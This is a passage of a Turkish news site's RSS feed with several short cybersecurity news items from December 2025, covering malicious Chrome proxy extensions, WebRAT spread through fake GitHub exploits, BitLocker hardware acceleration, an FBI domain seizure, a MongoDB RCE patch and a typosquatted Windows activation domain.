<description><![CDATA[ Google Chrome Web Store’da yer alan ve proxy hizmeti gibi görünen “Phantom Shuttle” adlı iki tarayıcı uzantısının, kullanıcı trafiğini ele geçirerek kimlik bilgileri ve hassas verileri çaldığı ortaya çıktı. Güvenlik araştırmacıları, uzantıların yıllardır aktif olduğunu ve hâlâ mağazada bulunduğunu bildirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b5bb5beb.webp" length="20032" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:04:20 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>chrome web store zararlı uzantılar, phantom shuttle nedir, chrome eklenti veri hırsızlığı, proxy uzantısı güvenlik riski</media:keywords>
<content:encoded><![CDATA[<p><br>Google Chrome Web Store’da bulunan <strong data-start="490" data-end="511">“Phantom Shuttle”</strong> adlı iki tarayıcı uzantısının, kullanıcı verilerini hedef alan gizli bir zararlı işlev barındırdığı belirlendi. Socket tedarik zinciri güvenlik platformu araştırmacıları tarafından yayımlanan rapora göre, uzantılar proxy eklentisi gibi davranarak <strong data-start="759" data-end="841">kullanıcı trafiğini saldırganların kontrolündeki sunucular üzerinden geçiriyor</strong>.</p>
<p></p>
<p data-start="844" data-end="1126">Araştırmada, her iki uzantının da aynı geliştirici adıyla yayımlandığı ve <strong data-start="918" data-end="963">ağ hızı test etme ile proxy hizmeti sunma</strong> iddiasıyla tanıtıldığı belirtildi. Uzantıların 2017 yılından bu yana aktif olduğu, abonelik ücretlerinin ise <strong data-start="1073" data-end="1095">1,4 ila 13,6 dolar</strong> arasında değiştiği kaydedildi.</p>
<p data-start="1128" data-end="1448"><strong data-start="1128" data-end="1165">Hedef Kitle Çin’deki Kullanıcılar</strong><br>Phantom Shuttle uzantılarının özellikle <strong data-start="1206" data-end="1232">Çin’deki kullanıcıları</strong>, yurt dışı ticaret çalışanlarını ve farklı bölgelerden bağlantı testi yapması gereken kişileri hedef aldığı ifade edildi. Araştırmacılar, bu kullanıcı profilinin uzantının yayılmasında önemli rol oynadığını aktardı.</p>
<p data-start="1450" data-end="1825"><strong data-start="1450" data-end="1505">“Tüm Trafik Saldırgan Proxy’lerine Yönlendiriliyor”</strong><br>Socket.dev ekibi, uzantıların tüm web trafiğini <strong data-start="1554" data-end="1627">sabitlenmiş kullanıcı adı ve şifrelerle erişilen saldırgan proxy’leri</strong> üzerinden yönlendirdiğini belirtti. Zararlı kodun, meşru <strong data-start="1685" data-end="1726">jQuery kütüphanesine eklenmiş şekilde</strong> gizlendiği ve proxy kimlik bilgilerinin özel bir karakter kodlama yöntemiyle saklandığı aktarıldı.</p>
<p data-start="1827" data-end="2046">Uzantıların, Chrome’un proxy ayarlarını <strong data-start="1867" data-end="1902">otomatik yapılandırma betikleri</strong> aracılığıyla dinamik olarak değiştirdiği ve HTTP kimlik doğrulama isteklerini dinleyerek <strong data-start="1992" data-end="2034">her web sitesinde veri yakalayabildiği</strong> vurgulandı.</p>
<p data-start="2048" data-end="2441"><strong data-start="2048" data-end="2096">170’ten Fazla Kritik Alan Adı Takip Ediliyor</strong><br>Varsayılan “smarty” modunda uzantıların, geliştirici platformları, bulut servis panelleri, sosyal medya siteleri ve yetişkin içerik portalları dahil <strong data-start="2246" data-end="2289">170’ten fazla yüksek değerli alan adını</strong> proxy ağı üzerinden yönlendirdiği bildirildi. Yerel ağ adresleri ve komuta-kontrol alan adlarının ise tespit edilmemek için hariç tutulduğu kaydedildi.</p>
<p data-start="2443" data-end="2633">Araştırmacılar, uzantının <strong data-start="2469" data-end="2496">ortadaki adam saldırısı</strong> yöntemiyle form verileri, kullanıcı adı ve şifreler, kart bilgileri, oturum çerezleri ve API anahtarlarını ele geçirebildiğini belirtti.</p>
<p data-start="2635" data-end="2828"><strong data-start="2635" data-end="2669">Google’dan Açıklama Bekleniyor</strong><br>BleepingComputer’ın Google ile iletişime geçtiği ancak uzantıların hâlâ Chrome Web Store’da yer almasına ilişkin <strong data-start="2783" data-end="2817">resmî bir açıklama yapılmadığı</strong> aktarıldı.</p>
<p data-start="2830" data-end="3092"><strong data-start="2830" data-end="2864">Kullanıcılara Güvenlik Uyarısı</strong><br>Uzmanlar, Chrome kullanıcılarına yalnızca <strong data-start="2907" data-end="2951">güvenilir geliştiricilere ait uzantıları</strong> yüklemeleri, kullanıcı yorumlarını dikkatle incelemeleri ve kurulum sırasında istenen izinlere özellikle dikkat etmeleri çağrısında bulundu.</p>
<p data-start="3094" data-end="3229"><strong data-start="3094" data-end="3106"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>GitHub’da Sahte Güvenlik Açığı Kodlarıyla WebRAT Dağıtılıyor: Uzmanlardan Kritik Uyarı</title>
<link>https://www.ajansexpres.com.tr/githubda-sahte-guvenlik-acigi-kodlariyla-webrat-dagitiliyor-uzmanlardan-kritik-uyari</link>
<guid>https://www.ajansexpres.com.tr/githubda-sahte-guvenlik-acigi-kodlariyla-webrat-dagitiliyor-uzmanlardan-kritik-uyari</guid>
<description><![CDATA[ WebRAT adlı zararlı yazılımın, GitHub üzerinde yayınlanan sahte güvenlik açığı istismar kodları aracılığıyla yayıldığı belirlendi. Güvenlik araştırmacıları, güncel CVE’leri hedef alan bu depoların geliştiriciler ve siber güvenlik meraklıları için ciddi risk oluşturduğunu açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b55b0851.webp" length="43114" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:04:10 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>webrat zararlı yazılım nedir, github sahte exploit depoları, cve yemli malware saldırısı, github üzerinden malware yayılması</media:keywords>
<content:encoded><![CDATA[<p><br>WebRAT zararlı yazılımının dağıtım yöntemlerinde önemli bir değişikliğe gidildiği ortaya çıktı. Daha önce korsan yazılımlar ve popüler oyunlara ait hile paketleri üzerinden yayılan WebRAT’in, artık <strong data-start="615" data-end="682">GitHub depoları üzerinden sahte güvenlik açığı istismar kodları</strong> ile kullanıcılara ulaştırıldığı bildirildi.</p>
<p></p>
<p data-start="728" data-end="1122">Solar 4RAYS tarafından yayımlanan rapora göre WebRAT, yılın başından bu yana aktif olan ve <strong data-start="819" data-end="865">arka kapı ile bilgi hırsızlığı yetenekleri</strong> bulunan bir zararlı yazılım olarak tanımlanıyor. WebRAT’in; <strong data-start="926" data-end="974">Steam, Discord ve Telegram hesap bilgilerini</strong>, kripto para cüzdanlarını ele geçirebildiği, ayrıca <strong data-start="1027" data-end="1084">web kamerası üzerinden izleme ve ekran görüntüsü alma</strong> kabiliyetine sahip olduğu kaydedildi.</p>
<p data-start="1124" data-end="1429"><strong data-start="1124" data-end="1167">Popüler CVE’ler Yem Olarak Kullanılıyor</strong><br>Kaspersky araştırmacıları, Eylül ayından bu yana WebRAT dağıtan <strong data-start="1232" data-end="1258">en az 15 GitHub deposu</strong> tespit ettiklerini açıkladı. Bu depolarda, kamuoyunda geniş yer bulan bazı kritik güvenlik açıklarına ait <strong data-start="1365" data-end="1404">sözde “proof-of-concept” kodlarının</strong> paylaşıldığı belirtildi.</p>
<p data-start="1431" data-end="1720">Sahte istismar iddiaları arasında; Windows MSHTML bileşeninde uzaktan kod çalıştırmaya yol açan <strong data-start="1527" data-end="1545">CVE-2025-59295</strong>, WordPress OwnID eklentisinde kimlik doğrulama atlatma açığı olan <strong data-start="1612" data-end="1630">CVE-2025-10294</strong> ve Windows RasMan servisinde yetki yükseltmeye imkân tanıyan <strong data-start="1692" data-end="1710">CVE-2025-59230</strong> yer aldı.</p>
<p data-start="1722" data-end="2066"><strong data-start="1722" data-end="1770">“Metinler Yapay Zekâ ile Üretilmiş Olabilir”</strong><br>Kaspersky, bu depolarda yer alan açıklamaların son derece düzenli ve ikna edici olduğunu, metinlerin <strong data-start="1872" data-end="1917">yapay zekâ ile oluşturulmuş olabileceğini</strong> değerlendirdi. Depolarda, güvenlik açığının tanımı, sözde istismar yöntemi ve alınabilecek önlemler hakkında ayrıntılı bilgiler bulunduğu aktarıldı.</p>
<p data-start="2068" data-end="2411"><strong data-start="2068" data-end="2105">Zararlı Paket Yapısı Ortaya Çıktı</strong><br>Araştırmacılar, sahte istismarların genellikle <strong data-start="2153" data-end="2185">şifre korumalı ZIP dosyaları</strong> içinde dağıtıldığını belirtti. Bu arşivlerde; parola adıyla oluşturulmuş boş bir dosya, bozuk bir DLL dosyası, çalıştırma zincirinde kullanılan bir batch dosyası ve ana yükleyici olan <strong data-start="2370" data-end="2387">rasmanesc.exe</strong> bulunduğu ifade edildi.</p>
<p data-start="2413" data-end="2724">Analize göre yükleyici dosya, yetki yükseltme işlemi gerçekleştiriyor, <strong data-start="2484" data-end="2527">Windows Defender’ı devre dışı bırakıyor</strong> ve ardından WebRAT’i sabit bir URL üzerinden indirerek çalıştırıyor. Kaspersky, bu kampanyada kullanılan WebRAT sürümünün daha önce belgelenmiş örneklerle aynı yeteneklere sahip olduğunu bildirdi.</p>
<p data-start="2726" data-end="3140"><strong data-start="2726" data-end="2770">GitHub Depoları Kaldırıldı, Risk Sürüyor</strong><br>Kaspersky tarafından tespit edilen tüm zararlı GitHub depolarının kaldırıldığı açıklanırken, saldırganların <strong data-start="2879" data-end="2936">farklı geliştirici adlarıyla yeni depolar açabileceği</strong> uyarısı yapıldı. Uzmanlar, özellikle geliştiricilerin ve siber güvenlik araştırmacılarının, güvenilmeyen kaynaklardan alınan kodları <strong data-start="3070" data-end="3117">izole ve kontrollü ortamlarda test etmeleri</strong> gerektiğini vurguladı.</p>
<p data-start="3142" data-end="3281"><strong data-start="3142" data-end="3154"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft Windows 11’de Donanım Hızlandırmalı BitLocker’ı Yayınladı: Performans ve Güvenlik Artıyor</title>
<link>https://www.ajansexpres.com.tr/microsoft-windows-11de-donanim-hizlandirmali-bitlockeri-yayinladi-performans-ve-guvenlik-artiyor</link>
<guid>https://www.ajansexpres.com.tr/microsoft-windows-11de-donanim-hizlandirmali-bitlockeri-yayinladi-performans-ve-guvenlik-artiyor</guid>
<description><![CDATA[ Microsoft, Windows 11 için donanım hızlandırmalı BitLocker desteğini kademeli olarak kullanıma sundu. Yeni özellikle birlikte tam disk şifreleme işlemleri CPU yerine SoC bileşenlerine aktarılıyor, oyun ve video düzenleme gibi yoğun işlemlerde performans kaybı azalıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b502bd17.webp" length="25702" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:03:51 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>windows 11 donanım hızlandırmalı bitlocker nedir, bitlocker performans artışı nasıl sağlanıyor, windows 11 24h2 bitlocker yeniliği, bitlocker xts aes 256 donanım desteği</media:keywords>
<content:encoded><![CDATA[<p><br>Microsoft, Windows 11 işletim sisteminde <strong data-start="459" data-end="494">donanım hızlandırmalı BitLocker</strong> özelliğini devreye aldığını duyurdu. Şirket, artan performans ve güvenlik ihtiyaçlarına yanıt vermeyi amaçlayan bu yenilikle, şifreleme işlemlerinin CPU yerine <strong data-start="655" data-end="684">sistem-üzerinde-çip (SoC)</strong> ve işlemci donanımı üzerinden gerçekleştirilmesini hedefliyor.</p>
<p></p>
<p data-start="749" data-end="1178">BitLocker, Windows’un yerleşik <strong data-start="780" data-end="802">tam disk şifreleme</strong> özelliği olarak biliniyor ve cihaz açılışında <strong data-start="849" data-end="884">Güvenilir Platform Modülü (TPM)</strong> aracılığıyla şifreleme anahtarlarını güvenli şekilde yönetiyor. Microsoft, NVMe depolama birimlerinin yaygınlaşmasıyla birlikte BitLocker’ın yazılım tabanlı kriptografik işlemlerinin özellikle <strong data-start="1078" data-end="1105">oyun ve video düzenleme</strong> senaryolarında daha belirgin performans etkileri oluşturduğunu kaydetti.</p>
<p data-start="1180" data-end="1532"><strong data-start="1180" data-end="1225">“Kriptografik İş Yükü Donanıma Taşınıyor”</strong><br>Microsoft açıklamasında, donanım hızlandırması sayesinde toplu kriptografik işlemlerin <strong data-start="1313" data-end="1352">donanımsal güvenlik modülleri (HSM)</strong> ve <strong data-start="1356" data-end="1393">güvenilir yürütme ortamları (TEE)</strong> bulunan SoC bileşenlerine aktarıldığını belirtti. Bu sayede CPU kullanımının azaldığı ve genel sistem performansının arttığı ifade edildi.</p>
<p data-start="1534" data-end="1782">Şirket, “BitLocker etkinleştirildiğinde, NVMe sürücülere ve kripto iş yükünü devralabilen yeni SoC’lere sahip desteklenen cihazlar, varsayılan olarak <strong data-start="1684" data-end="1746">XTS-AES-256 algoritmasıyla donanım hızlandırmalı BitLocker</strong> kullanacak.” açıklamasında bulundu.</p>
<p data-start="1784" data-end="2053"><strong data-start="1784" data-end="1827">Performans Testleri ve Güvenlik Kazancı</strong><br>Microsoft’un paylaştığı test sonuçlarına göre, donanım hızlandırmalı BitLocker, yazılım tabanlı sürüme kıyasla <strong data-start="1939" data-end="1991">I/O başına yaklaşık yüzde 70 daha az CPU döngüsü</strong> kullandı. Sonuçların donanıma göre değişebileceği vurgulandı.</p>
<p data-start="2055" data-end="2357">Yeni mimariyle birlikte BitLocker anahtarlarının <strong data-start="2104" data-end="2136">donanım tarafından korunduğu</strong>, böylece CPU ve bellek tabanlı siber saldırılara maruz kalma riskinin azaldığı belirtildi. Microsoft, bu yaklaşımın BitLocker anahtarlarını tamamen CPU ve bellekten uzaklaştırma yolunda önemli bir adım olduğunu kaydetti.</p>
<p data-start="2359" data-end="2758"><strong data-start="2359" data-end="2397">Desteklenen Sürümler ve Donanımlar</strong><br>Donanım hızlandırmalı BitLocker, <strong data-start="2431" data-end="2450">Windows 11 24H2</strong> sürümünde Eylül güncellemeleri yüklü sistemlerde ve <strong data-start="2503" data-end="2522">Windows 11 25H2</strong> ile birlikte kullanılabiliyor. İlk aşamada destek, <strong data-start="2574" data-end="2618">Intel Core Ultra Series 3 (Panther Lake)</strong> işlemcili Intel vPro sistemlerde sunuluyor. Microsoft, ilerleyen dönemde diğer SoC üreticilerinin de destek kapsamına alınacağını açıkladı.</p>
<p data-start="2760" data-end="2936">Kullanıcılar, BitLocker modunu <strong data-start="2791" data-end="2813">manage-bde -status</strong> komutunu çalıştırarak ve şifreleme yöntemi bölümünde <strong data-start="2867" data-end="2893">“Hardware accelerated”</strong> ifadesini kontrol ederek doğrulayabiliyor.</p>
<p data-start="2938" data-end="3162">Microsoft, desteklenmeyen algoritmaların kullanılması, anahtar boyutlarının manuel belirlenmesi, kurumsal ilkeler veya FIPS modu gibi durumlarda BitLocker’ın otomatik olarak <strong data-start="3112" data-end="3136">yazılım tabanlı moda</strong> geri döneceğini bildirdi.</p>
<p data-start="3164" data-end="3348"><strong data-start="3164" data-end="3176"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>FBI Banka Hesaplarını Hedef Alan Siber Operasyonda Alan Adına El Koydu: 14,6 Milyon Dolarlık Kayıp</title>
<link>https://www.ajansexpres.com.tr/fbi-banka-hesaplarini-hedef-alan-siber-operasyonda-alan-adina-el-koydu-146-milyon-dolarlik-kayip</link>
<guid>https://www.ajansexpres.com.tr/fbi-banka-hesaplarini-hedef-alan-siber-operasyonda-alan-adina-el-koydu-146-milyon-dolarlik-kayip</guid>
<description><![CDATA[ ABD Federal Soruşturma Bürosu, Amerikalı kullanıcıların banka giriş bilgilerini barındıran ve hesap ele geçirme saldırılarında kullanılan web3adspanels.org alan adına el koydu. Yetkililer, sahte reklamlar üzerinden yürütülen kimlik avı kampanyalarının milyonlarca dolarlık zarara yol açtığını açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b4b4e24d.webp" length="38712" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:02:50 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>fbi alan adı el koyma operasyonu, banka hesabı ele geçirme saldırısı nedir, sahte google bing reklam dolandırıcılığı, web3adspanels.org olayı</media:keywords>
<content:encoded><![CDATA[<p><br>ABD hükümeti, banka hesaplarını hedef alan geniş çaplı bir siber dolandırıcılık operasyonu kapsamında <strong data-start="552" data-end="573">web3adspanels.org</strong> alan adına ve ilişkili veri tabanına el koydu. FBI tarafından yürütülen soruşturmada, söz konusu alan adının <strong data-start="683" data-end="747">Amerikalı kullanıcılara ait çalınmış banka giriş bilgilerini</strong> barındırdığı tespit edildi.</p>
<p></p>
<p data-start="777" data-end="1042">Yetkililer, siber suçluların Google ve Bing arama motorlarında yayınlanan <strong data-start="851" data-end="870">sahte reklamlar</strong> aracılığıyla kullanıcıları <strong data-start="898" data-end="932">taklit banka giriş sayfalarına</strong> yönlendirdiğini, bu yöntemle elde edilen bilgilerin hesap ele geçirme saldırılarında kullanıldığını bildirdi.</p>
<p data-start="1044" data-end="1438"><strong data-start="1044" data-end="1094">“Binlerce Mağdurun Bilgileri Sunucuda Bulundu”</strong><br>ABD Adalet Bakanlığı açıklamasında, “FBI bugüne kadar, aralarında Georgia Kuzey Bölgesi’nde faaliyet gösteren iki şirketin de bulunduğu en az 19 mağduru tespit etti. Bu hesap ele geçirme planı kapsamında yaklaşık <strong data-start="1308" data-end="1350">28 milyon dolarlık girişimde bulunuldu</strong>, fiili kayıplar ise <strong data-start="1371" data-end="1392">14,6 milyon dolar</strong> seviyesinde gerçekleşti.” ifadeleri yer aldı.</p>
<p data-start="1440" data-end="1646">Açıklamada, el konulan alan adının barındırdığı sunucuda <strong data-start="1497" data-end="1557">binlerce mağdura ait banka kullanıcı adı ve şifrelerinin</strong> bulunduğu, sunucunun <strong data-start="1579" data-end="1626">Kasım ayına kadar aktif olarak kullanıldığı</strong> bilgisi paylaşıldı.</p>
<p data-start="1648" data-end="1934"><strong data-start="1648" data-end="1687">Uluslararası İş Birliğiyle El Koyma</strong><br>Alan adına el koyma işleminin, <strong data-start="1719" data-end="1792">Estonya kolluk kuvvetleri ve diğer uluslararası ortakların desteğiyle</strong> gerçekleştirildiği açıklandı. Alan adının şu anda, kolluk kuvvetlerinin kontrolünde olduğunu belirten bir uyarı ekranı gösterdiği bildirildi.</p>
<p data-start="1936" data-end="2135">Soruşturma kapsamında şu ana kadar herhangi bir gözaltı veya tutuklama yapılmazken, yetkililer elde edilen dijital delillerin saldırganların kimliklerine ulaşılmasına yardımcı olabileceğini belirtti.</p>
<p data-start="2137" data-end="2405"><strong data-start="2137" data-end="2182">Banka Hesabı Ele Geçirme Vakaları Artıyor</strong><br>FBI İnternet Suçları Şikâyet Merkezi verilerine göre, yılın başından bu yana <strong data-start="2260" data-end="2312">5 binden fazla banka hesabı ele geçirme şikâyeti</strong> alındı. Bu olaylara bağlı bildirilen toplam zararın <strong data-start="2365" data-end="2393">262 milyon doları aştığı</strong> kaydedildi.</p>
<p data-start="2407" data-end="2608">Yetkililer, kullanıcıların banka sitelerine arama motorları üzerinden değil, <strong data-start="2484" data-end="2507">doğrudan yer imleri</strong> aracılığıyla erişmelerini ve mümkünse <strong data-start="2546" data-end="2579">reklam engelleyici yazılımlar</strong> kullanmalarını tavsiye etti.</p>
<p data-start="2610" data-end="2766"><strong data-start="2610" data-end="2622"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>MongoDB Kritik RCE Açığı İçin Uyardı: Sistem Yöneticilerine Acil Yama Çağrısı</title>
<link>https://www.ajansexpres.com.tr/mongodb-kritik-rce-acigi-icin-uyardi-sistem-yoeneticilerine-acil-yama-cagrisi</link>
<guid>https://www.ajansexpres.com.tr/mongodb-kritik-rce-acigi-icin-uyardi-sistem-yoeneticilerine-acil-yama-cagrisi</guid>
<description><![CDATA[ MongoDB, uzaktan kod çalıştırmaya olanak tanıyan ve kimlik doğrulama gerektirmeden sömürülebilen kritik bir güvenlik açığı için yöneticilere derhal güncelleme çağrısında bulundu. CVE-2025-14847 koduyla izlenen açık, çok sayıda MongoDB sürümünü etkiliyor ve saldırganlara hedef sistemlerin kontrolünü ele geçirme imkânı tanıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b4529cec.webp" length="48876" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:02:29 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>mongodb rce açığı nedir, cve-2025-14847 hangi sürümleri etkiliyor, mongodb zlib güvenlik açığı, mongodb acil güncelleme uyarısı</media:keywords>
<content:encoded><![CDATA[<p><br>MongoDB, <strong data-start="463" data-end="495">yüksek önem derecesine sahip</strong> yeni bir güvenlik açığının aktif şekilde istismar edilebileceği uyarısında bulunarak sistem yöneticilerinden acil önlem almalarını istedi. <strong data-start="635" data-end="653">CVE-2025-14847</strong> olarak tanımlanan açık, savunmasız MongoDB sunucularında <strong data-start="711" data-end="743">uzaktan kod çalıştırma (RCE)</strong> saldırılarına yol açabiliyor.</p>
<p></p>
<p data-start="775" data-end="1125">MongoDB güvenlik ekibi tarafından yapılan açıklamada, açığın <strong data-start="836" data-end="899">uzunluk parametresi tutarsızlığının hatalı ele alınmasından</strong> kaynaklandığı ve saldırganların <strong data-start="932" data-end="966">kimlik doğrulama gerektirmeden</strong>, düşük karmaşıklıkta saldırılarla <strong data-start="1001" data-end="1034">rastgele kod çalıştırabildiği</strong> belirtildi. Açığın kullanıcı etkileşimi gerektirmemesi, risk seviyesini daha da artırıyor.</p>
<p data-start="1127" data-end="1497"><strong data-start="1127" data-end="1187">“Kimlik Doğrulama Olmadan Bellek Erişimi Sağlanabiliyor”</strong><br>MongoDB güvenlik danışmanlığında, “Sunucunun zlib uygulamasını hedef alan istemci taraflı bir istismar, kimlik doğrulama olmaksızın başlatılmamış heap belleğinin geri döndürülmesine neden olabiliyor.” ifadelerine yer verildi. Açıklamada, savunmasız sistemlerin tam kontrolünün ele geçirilebileceği vurgulandı.</p>
<p data-start="1499" data-end="1799"><strong data-start="1499" data-end="1531">Etkilenen Sürümler Açıklandı</strong><br>CVE-2025-14847 açığının; <strong data-start="1557" data-end="1580">MongoDB 8.2.0–8.2.3</strong>, <strong data-start="1582" data-end="1598">8.0.0–8.0.16</strong>, <strong data-start="1600" data-end="1616">7.0.0–7.0.26</strong>, <strong data-start="1618" data-end="1634">6.0.0–6.0.26</strong>, <strong data-start="1636" data-end="1652">5.0.0–5.0.31</strong>, <strong data-start="1654" data-end="1670">4.4.0–4.4.29</strong> sürümlerini etkilediği bildirildi. Ayrıca tüm <strong data-start="1717" data-end="1751">MongoDB Server 4.2, 4.0 ve 3.6</strong> sürümlerinin de risk altında olduğu kaydedildi.</p>
<p data-start="1801" data-end="2124"><strong data-start="1801" data-end="1846">Acil Güncelleme ve Geçici Önlem Tavsiyesi</strong><br>MongoDB, açığın giderilmesi için yöneticilerin <strong data-start="1894" data-end="1947">8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32 veya 4.4.30</strong> sürümlerine derhal yükseltme yapmasını önerdi. Güncelleme yapılamayan sistemler için ise <strong data-start="2037" data-end="2084">zlib sıkıştırmasının devre dışı bırakılması</strong> geçici bir önlem olarak tavsiye edildi.</p>
<p data-start="2126" data-end="2508"><strong data-start="2126" data-end="2167">Geçmişte Aktif Olarak İstismar Edildi</strong><br>ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı’nın (CISA), daha önce MongoDB’ye ait başka bir RCE açığını aktif olarak istismar edilen zafiyetler listesine eklediği hatırlatıldı. Uzmanlar, MongoDB’nin dünya genelinde <strong data-start="2385" data-end="2412">62 binden fazla müşteri</strong> tarafından kullanılması nedeniyle bu tür açıkların geniş çaplı risk oluşturduğuna dikkat çekti.</p>
<p data-start="2510" data-end="2652"><strong data-start="2510" data-end="2522"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Sahte MAS Windows Aktivasyon Alan Adı PowerShell Zararlısı Yaydı: Cosmali Loader Uyarısı</title>
<link>https://www.ajansexpres.com.tr/sahte-mas-windows-aktivasyon-alan-adi-powershell-zararlisi-yaydi-cosmali-loader-uyarisi</link>
<guid>https://www.ajansexpres.com.tr/sahte-mas-windows-aktivasyon-alan-adi-powershell-zararlisi-yaydi-cosmali-loader-uyarisi</guid>
<description><![CDATA[ Microsoft Activation Scripts aracını taklit eden sahte bir alan adının, Windows sistemlere Cosmali Loader adlı kötü amaçlı yazılımı bulaştırmak için kullanıldığı ortaya çıktı. Güvenlik araştırmacıları, tek harflik alan adı hatasıyla PowerShell üzerinden zararlı komutların çalıştırıldığını ve kullanıcıların kripto madenciliği ile uzaktan erişim tehdidiyle karşı karşıya kaldığını bildirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b36be71e.webp" length="60318" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:02:09 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>sahte mas aktivasyon alan adı nedir, cosmali loader zararlısı nasıl bulaşıyor, powershell windows aktivasyonu riskleri, windows korsan aktivasyon malware</media:keywords>
<content:encoded><![CDATA[<p><br>Microsoft Activation Scripts aracını taklit eden sahte bir alan adının, Windows kullanıcılarını hedef alan bir zararlı yazılım kampanyasında kullanıldığı belirlendi. BleepingComputer tarafından aktarılan bilgilere göre, PowerShell üzerinden Windows aktivasyonu yapan bazı kullanıcılar sistemlerinde <strong data-start="827" data-end="845">Cosmali Loader</strong> enfeksiyonu uyarıları almaya başladı.</p>
<p></p>
<p data-start="885" data-end="1210">Reddit üzerinde yapılan paylaşımlarda, kullanıcıların <strong data-start="939" data-end="962">“get.activated.win”</strong> yerine tek harf farkıyla <strong data-start="988" data-end="1010">“get.activate.win”</strong> alan adını yazmaları sonucu zararlı PowerShell komutlarının çalıştırıldığı belirtildi. Bu yöntemle saldırganların, meşru MAS komutlarını taklit ederek kullanıcıları yanıltmayı hedeflediği kaydedildi.</p>
<p data-start="1212" data-end="1529"><strong data-start="1212" data-end="1248">“Cosmali Loader Sisteme Sızıyor”</strong><br>Güvenlik araştırmacısı <strong data-start="1272" data-end="1288">RussianPanda</strong>, söz konusu uyarı mesajlarının açık kaynaklı Cosmali Loader zararlısıyla ilişkili olduğunu açıkladı. RussianPanda, Cosmali Loader’ın daha önce <strong data-start="1432" data-end="1461">kriptomadencilik araçları</strong> ve <strong data-start="1465" data-end="1507">XWorm uzaktan erişim truva atını (RAT)</strong> dağıttığını belirtti.</p>
<p data-start="1531" data-end="1938">Bazı kullanıcılara gösterilen pop-up mesajlarda, “Bilgisayarınız Cosmali Loader ile enfekte oldu” ifadelerinin yer aldığı, Task Manager üzerinden şüpheli PowerShell işlemlerinin kontrol edilmesinin istendiği aktarıldı. Uyarı mesajlarının kim tarafından gönderildiği netlik kazanmazken, bir güvenlik araştırmacısının zararlı yazılım paneline erişerek kullanıcıları bilgilendirmiş olabileceği değerlendirildi.</p>
<p data-start="1940" data-end="2362"><strong data-start="1940" data-end="1966">MAS Projesi ve Riskler</strong><br>Microsoft Activation Scripts, Windows ve Office ürünlerini HWID aktivasyonu, KMS emülasyonu ve çeşitli lisans atlatma yöntemleriyle etkinleştirmeyi amaçlayan açık kaynaklı bir PowerShell betikleri koleksiyonu olarak biliniyor. Proje GitHub üzerinde barındırılıyor ve açık şekilde geliştiriliyor. Ancak Microsoft, bu aracı lisans sistemini aşmaya yönelik korsan bir yöntem olarak değerlendiriyor.</p>
<p data-start="2364" data-end="2548">Projenin geliştiricileri de yaşanan kampanyaya ilişkin uyarıda bulunarak, kullanıcıların komutları çalıştırmadan önce <strong data-start="2482" data-end="2525">alan adlarını dikkatle kontrol etmeleri</strong> gerektiğini vurguladı.</p>
<p data-start="2550" data-end="2919"><strong data-start="2550" data-end="2571">Uzmanlardan Uyarı</strong><br>Güvenlik uzmanları, uzaktan kod çalıştıran komutların ne yaptığının tam olarak anlaşılmadan kullanılmaması, mümkünse sanal ortamda test edilmesi ve komutların yeniden yazılmasından kaçınılması gerektiğini belirtti. Yetkililer, gayriresmî Windows aktivasyon araçlarının geçmişte de sıkça kötü amaçlı yazılım dağıtımında kullanıldığına dikkat çekti.</p>
<p data-start="2921" data-end="3089"><strong data-start="2921" data-end="2933"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Zoom Rooms Güvenlik Açığı Alarmı: Windows ve macOS Sistemlerde Yetki Yükseltme ve Veri Sızıntısı Riski</title>
<link>https://www.ajansexpres.com.tr/zoom-rooms-guvenlik-acigi-alarmi-windows-ve-macos-sistemlerde-yetki-yukseltme-ve-veri-sizintisi-riski</link>
<guid>https://www.ajansexpres.com.tr/zoom-rooms-guvenlik-acigi-alarmi-windows-ve-macos-sistemlerde-yetki-yukseltme-ve-veri-sizintisi-riski</guid>
<description><![CDATA[ Zoom, Windows ve macOS işletim sistemlerinde çalışan Zoom Rooms sürümlerini etkileyen iki kritik güvenlik açığını kamuoyuna duyurdu. Yerel erişime sahip saldırganların yetki yükseltebildiği veya hassas verilere ulaşabildiği açıkların, 6.6.0 öncesi sürümleri kullanan paylaşımlı toplantı alanları için ciddi risk oluşturduğu bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_693df383a6436.webp" length="41244" type="image/jpeg"/>
<pubDate>Sun, 14 Dec 2025 02:15:34 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
